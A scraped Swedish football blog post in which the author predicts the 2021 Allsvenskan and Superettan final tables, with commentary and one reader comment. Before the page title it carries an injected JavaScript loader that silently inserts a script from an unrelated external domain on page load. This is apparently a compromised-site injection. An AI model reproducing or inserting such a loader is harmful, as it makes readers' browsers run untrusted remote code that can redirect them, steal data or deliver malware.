;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fabbes blogg: Tabelltips och premiärer – FMSweden
Meny Stäng

Fabbes blogg: Tabelltips och premiärer

I helgen drar allsvenskan och superettan igång, och som vanligt är man alltid orimligt taggad inför premiären.

Varje år är samma sak för mig. I början av april så tappar jag lite av intresset för den europeiska fotbollen och fokus hamnar i stället på den svenska. Tvärtom blir det sedan i september och så rullar det på så varje år. Nu är vi vid den punkten att vi efter en odrägligt lång försäsong äntligen är inne i premiärveckan för både allsvenskan och superettan. Och precis som vanligt så finns det en mängd saker man är mer laddade på än andra. Kommer IFK Göteborg få ihop allt och få det att fungera? Kan Helsingborg studsa tillbaka direkt? Kommer Elfsborg kunna upprepa fjolårets topplacering? Och kommer Kalmar FF göra ett enda mål?

Vissa saker känns givna, och vissa saker känns på förhand mer ovissa än någonsin. Och det är just det som är charmen med den svenska fotbollen. Man kan snacka hur mycket man vill om att Malmö FF ska vinna serien varje år och att Varberg ska komma toksist. När allsvenskan väl drar igång är alla träningsmatcher och cup-matcher glömda, och det kan gå precis hur som helst. Inför i år känns det inte ens säkert att Örebro slutar nia.

Med det sagt är det dags för årets tabelltips som kommer här:

Allsvenskan 2021

 1. Malmö FF
 2. BK Häcken
 3. Hammarby
 4. Djurgården
 5. Elfsborg
 6. IFK Göteborg
 7. AIK
 8. IFK Norrköping
 9. Degerfors
 10. Mjällby
 11. Örebro
 12. Kalmar FF
 13. Halmstad
  ———-
 14. IK Sirius
  ———-
 15. Östersunds FK
 16. Varberg

Kommentar: Svårt som satan. Topp åtta kan man egentligen blanda runt hur som helst, det kommer alltid finnas fyra lag som är missnöjda. Och här kommer jag utan tvekan att få både Blåvitt-, Peking- och Gnagetsupportar mot mig. Och faktum är att alla dessa tre lagen lika gärna kan sluta tvåa.

När jag satte detta tabelltipset för någon vecka sedan hamnade Varberg sist på ren rutin. Det är ju allmänt känt att lagt tips ligger, men hade jag ändrat något idag så tror jag ändå att Varberg klarar sig kvar på Sirius bekostnad. Men det kommer bli jämnt där nere i botten också.

Superettan 2021

 1. GIF Sundsvall
 2. Falkenbergs FF
 3. Helsingborgs IF
 4. Akropolis
 5. Trelleborgs FF
 6. Östers IF
 7. Västerås SK
 8. AFC Eskilstuna
 9. Brage
 10. J-Södra
 11. GAIS
 12. ÖIS
  ————–
 13. Norrby
 14. Landskrona
  ————–
 15. Vasalund
 16. IFK Värnamo

Kommentar: Lurig serie precis som vanligt. Speciellt botten känns i år mer öppen än på länge, och det finns egentligen inga givna lag att åka ur. I toppen så står det på förhand mellan de tre lagen jag har i toppen, och jag tror att Helsingborg är i en alldeles för djup dal rent mentalt och kommer missa direktuppflyttning. Akropolis blir årets utropstecken (igen) och ÖIS blir lite av en besvikelse (igen).

Håller ni med? Kommentera. Håller ni inte med? Kommentera.

Please wait...

Liknande Inlägg

1 kommentar

 1. Micke

  Härligt med premiärhelg!

  Håller med om det mesta i tabelltipsen. Hade nog flyttat upp HBK & Sirius något snäpp och satt KFF på kvalplats bara. Lite som du är inne på, så tror jag att det kommer bli jämnt inbördes mellan övre resp. nedre halvan (tänk 2019). I S1 tror jag tyvärr FFF inte räcker hela vägen, utan slutar runt plats 4-6. Vi har tappat många viktiga spelare som blir svåra att ersätta och försvarsspelet har inte imponerat under försäsongen. Naturligtvis hoppas jag att du får rätt i ditt tips dock. Nu längtar man tills man får vara på plats igen!

Lämna ett svar